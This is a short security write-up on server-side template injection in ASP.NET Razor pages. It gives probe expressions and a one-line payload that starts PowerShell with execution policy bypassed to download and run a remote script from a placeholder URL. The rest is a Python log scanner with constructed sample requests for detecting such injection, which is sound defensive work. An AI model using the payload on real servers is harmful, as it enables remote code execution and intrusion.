ASP Razor Basic Code Execution

What is Razor?

Razor is a markup syntax that lets you embed server-based code (Visual Basic and C#) into web pages.

Razor is based on ASP.NET, and designed for creating web applications. It has the power of traditional ASP.NET markup, but it is easier to use, and easier to learn.

For more information, please visit the following links:

https://docs.microsoft.com/aspnet/core/mvc/views/razor?view=aspnetcore-2.1

https://www.w3schools.com/asp/razor_intro.asp

Razor Code Execution

<html lang="en">
<head>
     <meta charset="utf-8" />
     <title>Web Pages Demo</title>
</head>
<body>
     <h1>Hello Web Pages</h1>
     <p>The time is @DateTime.Now</p>
</body>
</html>

Other basic PoCs work here as well:

@Decimal.Add(7, 7)
@AppContext.BaseDirectory
@Environment.MachineName

We can also go straight for a reverse shell. A small payload:

@System.Diagnostics.Process.Start(“powershell.exe”,”-ExecutionPolicy Bypass -Command IEX (New-Object Net.WebClient).DownloadString(‘http://url/script.ps1’))

You will find a good explanation and a good case at the following link: https://www.scip.ch/en/?labs.20170105
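
On the detection side, the expressions above all share one trace in request logs: Razor's @ followed by a dotted .NET name. The following is an added example, not code from the original post, that scans URL-decoded query parameters for that pattern; the log lines, the `name` parameter and the `EXEC_PREFIXES` list are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# "@" not preceded by a word character or another "@" (so e-mail addresses and
# the "@@" escape are skipped), followed by a dotted .NET-style name or by the
# "(" / "{" that opens an explicit Razor expression or code block.
RAZOR_EXPR = re.compile(r"(?<![\w@])@(\(|\{|[A-Za-z_]\w*(?:\.[A-Za-z_]\w*)+)")

# Namespaces treated as process-execution attempts (assumed list, extend as needed).
EXEC_PREFIXES = ("System.Diagnostics.",)

# Request portion of a common/combined-format access-log line.
REQUEST = re.compile(r'"(?:GET|POST|PUT|DELETE|PATCH) (\S+) HTTP/[\d.]+"')


def razor_hits(value):
    """Return (expression, severity) for each Razor transition found in value."""
    hits = []
    for m in RAZOR_EXPR.finditer(value):
        expr = m.group(1)
        severity = "exec" if expr.startswith(EXEC_PREFIXES) else "probe"
        hits.append((expr, severity))
    return hits


def scan_log_line(line):
    """Decode the query string of one access-log line and scan every parameter."""
    m = REQUEST.search(line)
    if not m:
        return []
    findings = []
    for name, value in parse_qsl(urlsplit(m.group(1)).query, keep_blank_values=True):
        findings += [(name, expr, sev) for expr, sev in razor_hits(value)]
    return findings


# Constructed sample lines (not real traffic).
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /greet?name=%40Environment.MachineName HTTP/1.1" 200 512',
    '10.0.0.6 - - [01/Jan/2024:10:00:02 +0000] "GET /greet?name=alice%40example.com HTTP/1.1" 200 498',
    '10.0.0.7 - - [01/Jan/2024:10:00:05 +0000] "GET /greet?name=%40Decimal.Add(7,+7) HTTP/1.1" 200 501',
    '10.0.0.8 - - [01/Jan/2024:10:00:09 +0000] "GET /greet?name=%40System.Diagnostics.Process.Start(%22x%22) HTTP/1.1" 500 0',
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        for finding in scan_log_line(line):
            print(finding)
```

A hit only shows that someone sent Razor syntax; whether it executed depends on the application compiling that input as a template, so pair the alert with the response (for example, a reflected machine name or a 500).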
